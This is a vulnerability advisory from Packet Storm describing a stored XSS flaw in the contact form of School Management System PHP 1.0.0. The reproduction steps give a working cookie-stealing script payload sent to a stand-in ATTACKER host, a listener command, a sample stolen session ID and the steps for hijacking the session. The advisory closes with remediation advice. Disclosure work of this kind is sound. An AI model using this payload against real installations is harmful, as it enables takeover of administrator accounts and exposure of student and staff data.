School Management System PHP 1.0.0 Cross Site Scripting
Source: Packet Storm file 220054, https://packetstorm.news/files/id/220054/ (published 2026-04-29)

====================================================
School Management System PHP - Stored XSS leading to Admin Account Takeover
====================================================

Author: Mehmet Utku Köken
Date: 2026-04-28
CVE: N/A
Vendor Homepage: https://github.com/codingWithElias/school-management-system-php
Version: 1.0.0 (commit f1ac334)
Tested on: Windows 10 / XAMPP / PHP 8.x
Category: Webapps
Platform: PHP

== Description ==

A stored cross-site scripting (XSS) vulnerability exists in School
Management System PHP. The public contact form handler at
/req/contact.php stores the full_name and message parameters in the
database without validating or encoding them, and the admin message
panel at /admin/message.php renders the stored values back into the
page unescaped. When an administrator opens the panel, the stored
payload executes in the administrator's browser context. Because the
contact form requires no authentication, an anonymous attacker can use
this to read the administrator's session cookie and take over the
account.

== Affected Parameters ==

  - full_name
  - message

== Affected Files ==

  - /req/contact.php      (unsanitized input stored)
  - /admin/message.php    (stored value rendered, payload executes)

== Steps to Reproduce ==

1. Open the contact form at:
   http://TARGET/school-management-system-php/
   and submit it with any values.

2. Intercept the POST request and place the payload in the full_name
   or message parameter. Decoded, the body is:

   email=attacker@evil.com&full_name=<script>new Image().src='http://ATTACKER:8888/?c='+document.cookie</script>&message=hello

   The body is application/x-www-form-urlencoded, so the payload must
   be URL-encoded before it is sent: a bare '+' decodes to a space on
   the server, which turns the JavaScript into a syntax error. As sent:

   POST /school-management-system-php/req/contact.php HTTP/1.1
   Host: TARGET
   Content-Type: application/x-www-form-urlencoded

   email=attacker%40evil.com&full_name=%3Cscript%3Enew+Image%28%29.src%3D%27http%3A%2F%2FATTACKER%3A8888%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E&message=hello

3. Start a listener on the attacker machine (from an empty directory,
   since http.server serves the directory it is started in):

   python3 -m http.server 8888

4. Wait for the administrator to visit the messages panel:
   http://TARGET/school-management-system-php/admin/message.php

5. The listener logs the request carrying the admin session cookie:

   GET /?c=PHPSESSID=ao7emtlus8bf87dkpumutl4v3q HTTP/1.1

   document.cookie exposes PHPSESSID because the application issues the
   session cookie without the HttpOnly flag (PHP's default). With
   HttpOnly set the cookie could not be read this way, but the injected
   script would still run with the administrator's privileges and could
   drive the admin panel directly from the administrator's browser.

6. Use the captured session cookie to access the admin panel without
   credentials by sending:

   Cookie: PHPSESSID=ao7emtlus8bf87dkpumutl4v3q

   with requests to:
   http://TARGET/school-management-system-php/admin/

   The hijacked session remains usable until the administrator logs
   out or the session expires.

== Impact ==

An unauthenticated attacker can submit a malicious payload via the
public contact form. Once the administrator views the messages, the
attacker receives the admin PHPSESSID and gains full administrative
access to the application, including student records, teacher data
and system configuration.

== Remediation ==

The advisory proposes no fix. The standard one is to HTML-encode each
stored field at the point where /admin/message.php prints it
(htmlspecialchars with ENT_QUOTES and UTF-8), and to limit the damage
of any remaining XSS by issuing the session cookie with HttpOnly and
SameSite (session.cookie_httponly and session.cookie_samesite) and by
serving the admin pages with a Content-Security-Policy that disallows
inline scripts.

== References ==

https://owasp.org/www-community/attacks/xss/
https://github.com/codingWithElias/school-management-system-php